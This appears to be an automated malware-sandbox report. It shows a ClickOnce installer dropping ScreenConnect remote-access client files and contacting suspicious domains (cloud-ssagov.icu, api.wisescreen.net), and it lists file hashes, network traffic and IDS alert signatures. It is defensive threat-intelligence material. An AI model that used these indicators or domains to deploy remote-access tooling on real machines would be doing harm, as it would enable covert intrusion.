(PID) Process:(3856) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
XGEK87JJV0VR0HRQ93OKQY7R
(PID) Process:(3856) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
16
Suspicious files
32
Text files
54
Unknown types
0

Dropped files

PID
Process
Filename
Type
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsClient.exe.manifestxml
MD5:7F68A01C2FEA1C80A75E287BB36D6B43
SHA256:2E0E46F395D5A6440F179B61C4008ABF3D72CFCDA705A543C8EE18B41D37B025
3856dfsvc.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792dbf
MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
3856dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:1F07F2BE1F2690EF264440070ECF26DE
SHA256:BE83861A2C0E5CE9E077238B4438532B05E1455265B95756A3DF0CF46C34894B
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.ClientService.exeexecutable
MD5:75B21D04C69128A7230A0998086B61AA
SHA256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsFileManager.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
3856dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141binary
MD5:04A51162BEB032D514BA8674C790E5F9
SHA256:5A962C83C6803F4AEDBEA61F26EEACB185E2F4E492CE90BED2948A2E955B995E
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsBackstageShell.exeexecutable
MD5:AFA97CAF20F3608799E670E9D6253247
SHA256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsClient.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
3856dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\AZRC1ZVX.E0Y\Q81G9C75.WKW\ScreenConnect.WindowsBackstageShell.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
3856dfsvc.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42Bbinary
MD5:A2914C69101502A2CEE7E6A7C4C9E8B9
SHA256:EC58E4DD00077E9B0BFF2DB2D69963EAF796E998BD50597CDA38EF11DBB90762
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
16
TCP/UDP connections
43
DNS requests
30
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3856
dfsvc.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
3856
dfsvc.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
4932
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4932
svchost.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3856
dfsvc.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
whitelisted
848
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
1588
WerFault.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1588
WerFault.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2480
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4932
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3856
dfsvc.exe
185.49.126.73:443
cloud-ssagov.icu
GCI Network Solutions Limited
GB
unknown
4
System
192.168.100.255:138
whitelisted
3856
dfsvc.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4932
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4932
svchost.exe
2.16.164.9:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
4932
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.142
whitelisted
cloud-ssagov.icu
  • 185.49.126.73
unknown
ocsp.digicert.com
  • 192.229.221.95
whitelisted
crl.microsoft.com
  • 2.16.164.9
  • 2.16.164.49
  • 23.216.77.28
  • 23.216.77.6
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
www.bing.com
  • 2.23.209.133
  • 2.23.209.130
  • 104.126.37.162
  • 104.126.37.160
  • 104.126.37.186
  • 104.126.37.131
  • 104.126.37.176
  • 104.126.37.130
  • 104.126.37.178
  • 104.126.37.171
  • 104.126.37.137
whitelisted
login.live.com
  • 20.190.159.23
  • 20.190.159.2
  • 20.190.159.4
  • 40.126.31.73
  • 20.190.159.75
  • 20.190.159.68
  • 20.190.159.0
  • 20.190.159.71
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
api.wisescreen.net
  • 185.49.126.73
unknown

Threats

PID
Process
Class
Message
2192
svchost.exe
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
3856
dfsvc.exe
Potentially Bad Traffic
ET INFO Suspicious Domain (*.icu) in TLS SNI
3856
dfsvc.exe
Misc activity
ET INFO Observed ZeroSSL SSL/TLS Certificate
3856
dfsvc.exe
Potentially Bad Traffic
ET INFO Observed ZeroSSL Certificate for Suspicious TLD (.icu)
6644
ScreenConnect.ClientService.exe
Potential Corporate Privacy Violation
REMOTE [ANY.RUN] ScreenConnect Server Response
Potentially Bad Traffic
ET INFO Dotted Quad Host VBS Request
Process
Message
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741772 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\win32\isoreg_direct.cpp, line 1127
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/Bin/Support.Client.exe